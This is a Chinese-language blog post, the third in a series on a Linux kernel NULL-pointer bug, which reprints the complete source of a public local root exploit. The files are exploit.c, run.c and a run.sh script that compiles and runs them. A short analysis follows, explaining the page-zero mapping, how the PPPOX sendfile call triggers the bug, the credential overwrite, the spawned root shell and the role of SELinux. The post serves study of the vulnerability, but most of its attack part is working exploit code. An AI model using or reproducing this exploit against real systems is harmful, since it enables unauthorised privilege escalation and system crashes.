Linux内核NULL指针引发的BUG（三）--源码-Godbach-ChinaUnix博客

哥德巴赫猜想godbach.blog.chinaunix.net

首页　| 　博文目录　| 　关于我

godbach

博客访问： 2326987
博文数量： 145
博客积分： 8668
博客等级：中将
技术积分： 3922
用户组：普通用户
注册时间： 2007-03-09 21:21

个人简介

work hard

文章分类

全部博文（145）

HAProxy（9）
内核研究（72）

系统安全（7）

流量管理（9）

网络安全（12）
程序设计（22）

Perl（2）

VC（1）

C编程（8）

Shell（11）
SSL（3）
版本管理（6）
Linux（13）
Unix（3）
随笔（14）

历史（3）

影视（2）
杂项（3）
未分配的博文（0）

文章存档

2016年（1）

2015年（1）

2014年（1）

2013年（12）

2012年（3）

2011年（9）

2010年（34）

2009年（55）

2008年（20）

2007年（9）

我的朋友

相关博文

Linux内核NULL指针引发的BUG（三）--源码

分类： LINUX

2010-01-13 16:21:00

本文贴出《Linux内核NULL指针引发的BUG（二）--剖析》（下文简称文二）中提到全部源码。源码的链接为：http://www.securityfocus.com/data/vulnerabilities/exploits/36038-4.tgz
【警告：本文中列出的代码仅限于学习和研究使用。任何用于非法用途的，请自行承担责任。】

本文欢迎自由转载，但请标明出处，并保证本文的完整性。
作者：Godbach
Blog：http://Godbach.cublog.cn
日期：2010/01/13

一、源码
源码总共分为三个文件：exploit.c，run.c和run.sh。
1. exploit.c的源码如下：

/* * 14.08.2009, babcia padlina * * vulnerability discovered by google security team * * some parts of exploit code borrowed from vmsplice exploit by qaaz * per_svr4 mmap zero technique developed by Julien Tinnes and Tavis Ormandy: * */ #include <stdio.h> #include <sys/socket.h> #include <sys/user.h> #include <sys/types.h> #include <sys/wait.h> #include <inttypes.h> #include <sys/reg.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <sys/personality.h> static unsigned int uid, gid; #define USER_CS 0x73 #define USER_SS 0x7b #define USER_FL 0x246 #define STACK(x) (x + sizeof(x) - 40) void exit_code(); char exit_stack[1024 * 1024]; static inline __attribute__((always_inline)) void *get_current() { unsigned long curr; __asm__ __volatile__ ( "movl %%esp, %%eax ;" "andl %1, %%eax ;" "movl (%%eax), %0" : "=r" (curr) : "i" (~8191) ); return (void *) curr; } static inline __attribute__((always_inline)) void exit_kernel() { __asm__ __volatile__ ( "movl %0, 0x10(%%esp) ;" "movl %1, 0x0c(%%esp) ;" "movl %2, 0x08(%%esp) ;" "movl %3, 0x04(%%esp) ;" "movl %4, 0x00(%%esp) ;" "iret" : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), "i" (USER_CS), "r" (exit_code) ); } void kernel_code() { int i; uint *p = get_current(); for (i = 0; i < 1024-13; i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = p[2] = p[3] = 0; p[4] = p[5] = p[6] = p[7] = 0; p = (uint *) ((char *)(p + 8) + sizeof(void *)); p[0] = p[1] = p[2] = ~0; break; } p++; } exit_kernel(); } void exit_code() { if (getuid() != 0) { fprintf(stderr, "failed\n"); exit(-1); } execl("/bin/sh", "sh", "-i", NULL); } int main(void) { char template[] = "/tmp/padlina.XXXXXX"; int fdin, fdout; void *page; uid = getuid(); gid = getgid(); setresuid(uid, uid, uid); setresgid(gid, gid, gid); if ((personality(0xffffffff)) != PER_SVR4) { if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) { perror("mmap"); return -1; } } else { if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) { perror("mprotect"); return -1; } } *(char *)0 = '\x90'; *(char *)1 = '\xe9'; *(unsigned long *)2 = (unsigned long)&kernel_code - 6; if ((fdin = mkstemp(template)) < 0) { perror("mkstemp"); return -1; } if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) { perror("socket"); return -1; } unlink(template); ftruncate(fdin, PAGE_SIZE); sendfile(fdout, fdin, NULL, PAGE_SIZE); }

2. run.c的代码如下：

#include <sys/personality.h> #include <stdio.h> #include <unistd.h> int main(void) { if (personality(PER_SVR4) < 0) { perror("personality"); return -1; } fprintf(stderr, "padlina z lublina!\n"); execl("./exploit", "exploit", 0); }

3. run.sh的代码如下：

#!/bin/sh gcc -o run run.c && \ gcc -o exploit exploit.c && \ ./run

二、简要分析
    可见，run.sh无非就是编译expolit.c和run.c并执行run程序。而run.c中其实就是先设置一下程序的执行域PER_SVR4，然后就执行exploit程序。

   那么，我们应该可以将run.c中设置执行域的那段代码放到exploit.c中main函数的开始部分，这样就可以将可执行程序合并成1个了。

   根据文二的分析，exploit.c中最后创建socket并调用sendfile部分的代码，即触发内核NULL pointer的代码。因为PPPOX协议的proto_ops结构并未初始化sock_sendpage函数指针。因为该函数指针指向NULL。因此，调用sendfile到内核之后，最终调用了sock_sendpage。由于其指向NULL，我们之前的代码已经将0地址进行映射，并设置为可执行。故而就执行0地址的执行，即jmp kernel_code。通过kernel_code函数，获取到了系统的root权限。

   这里还牵涉到另外一个问题，也就是通常系统是不能将0地址映射的，具体可参见《Linux内核NULL指针引发的BUG（一）--介绍》，简称文一。即通过sysctl变量vm.mmap_min_addr设置实现。但是一些LSM诸如SElinux对其进行了修改。这就导致了可以映射0地址。以上代码之所以可以顺利的获取到root权限就在于系统启用了SElinux模块。如果关闭SElinux，该代码就不会执行成功。

   因此，有文章就提到SElinux反而弱化了Linux系统的安全功能。我们将在下一篇文章中转载一篇SElinux Team的开发人员发表的一篇文章，谈到了他对SElinux和non-SElinux的系统安全的看法。

三、总结
对于这样的BUG，个人有两点内容总结：
（1）我们可以通过该Bug的利用方式，能够明白只要有相关用户态的调用切换到内核态，而内核态调用的函数指向了NULL，那么上面的代码就可以顺利的执行。
    本人曾经在开启SElinux的系统上，加载一个注册proc文件的内核模块。其中read函数里面调用了一个指向NULL的函数指针。然后将引发BUG的代码（上面的socket和sendfile）改为打开一个proc文件（调用open和read），同样获取到root用户的权限。

（2）即使在有些系统上无法顺利的利用该漏洞获取到root权限，但是只要其相关的代码没有修改，比如sock_sendpage函数调用之前仍不判断其有效性，那么我们同样可以利用exploit.c中触发BUG的代码，来攻击一个系统，至少可以上该系统的内核报出Oops。
   这也相当于为我们提供了一种挖掘Linux内核BUG的方法。

阅读(2866) | 评论(1) | 转发(3) |

上一篇：SVN服务器之用户权限配置——authz文件

下一篇：tc流量管理简介

给主人留下些什么吧！~~

chinaunix网友2010-05-03 23:58:15

关键是在selinux disabled的情况下怎么才能绕过 "拒绝0地址映射"？

回复 | 举报

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6